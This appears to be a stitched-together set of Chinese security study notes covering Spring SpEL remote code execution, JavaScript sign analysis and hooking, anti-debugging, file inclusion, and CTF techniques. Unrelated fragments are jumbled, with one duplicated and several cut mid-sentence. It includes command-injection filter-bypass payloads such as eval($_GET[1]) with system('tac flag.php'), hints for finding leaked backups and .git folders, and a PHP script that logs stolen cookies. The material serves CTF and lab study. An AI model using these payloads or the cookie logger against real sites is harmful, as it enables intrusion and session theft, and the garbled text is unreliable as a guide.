Java:Spring Boot 框架漏洞
//靶场:https://github.com/whgojp/JavaSecLab Spel Spring 框架的表达式语言,可以在运行的时候查询数据,调用方法 --> 调用 getRuntime,exec() 就会造成 RCE 漏洞 同类的还有 struts2 的 ognl,不过很少用了 漏洞测试
//靶场:https://github.com/whgojp/JavaSecLab Spel Spring 框架的表达式语言,可以在运行的时候查询数据,调用方法 --> 调用 getRuntime,exec() 就会造成 RCE 漏洞 同类的还有 struts2 的 ognl,不过很少用了 漏洞测试
类似加密算法分析 Sign 可以防篡改,防重放,Burp 炸缸了 分析1 //案例:https://www.kaoshibao.com/ 数据包标头发现 sign,调用堆栈又臭又长,那就在地址下断,XHR/提取断点+网址 看见 m 中有 sign,so- > sign 在断点之前就出来了,看调用堆栈
HOOK 脚本 Js Hook(钩子):通过拦截和修改JavaScript 函数或对象行为的技术,安卓、逆向、免杀、二进制等等都会用到 主要用于: *动态分析网页行为 *修改页面功能
反调试 防止他人调试,动态分析自己的代码 检测调试方法 -无限Debugger技术
flag被过滤:system('tac fla*'); system被过滤:echo `tac fla*` 拼接法:?c=$a=sys;$b=tem;$c=$a.$b;$c("tac fla*"); 再传参:?c=eval($_GET[1]);&1=system("tac flag.php"); 利
docker部署 sudo apt update apt install docker apt install docker-compose cd sudo docker-compose up - d INF:表示“无穷大”,通常在除以零的操作中出现,例如1.0/0.0 NaN:表示“不是一个数字”
F12,注释里面找 打不开F12,选中 url 按F12,url 前加view-source:,ctrl+u 没思路抓包看看 不会藏在robots.txt里面吧 备份文件泄露:index.phps;Linux的备份文件:index.php.swp;www.zip;fzbk 扫描 git泄露,访问.g
原理 开发人员会将重复使用的函数统一写进一个文件中,再利用 include 包含调用 如果文件能控制,则存在文件包含漏洞 include()并不在意文件格式是什么,只要有php代码,就会被执行 分类 本地包含-----local 远程包含-----remote 差异原因:跟代码过滤和配置文件开关有关
<?php $cookie = $_GET['cookie']; $time = date('Y-m-d h:i:s', time()); $log = fopen("cookie.txt", "a"); fwrite($log,$time.': '. $cookie . "\n");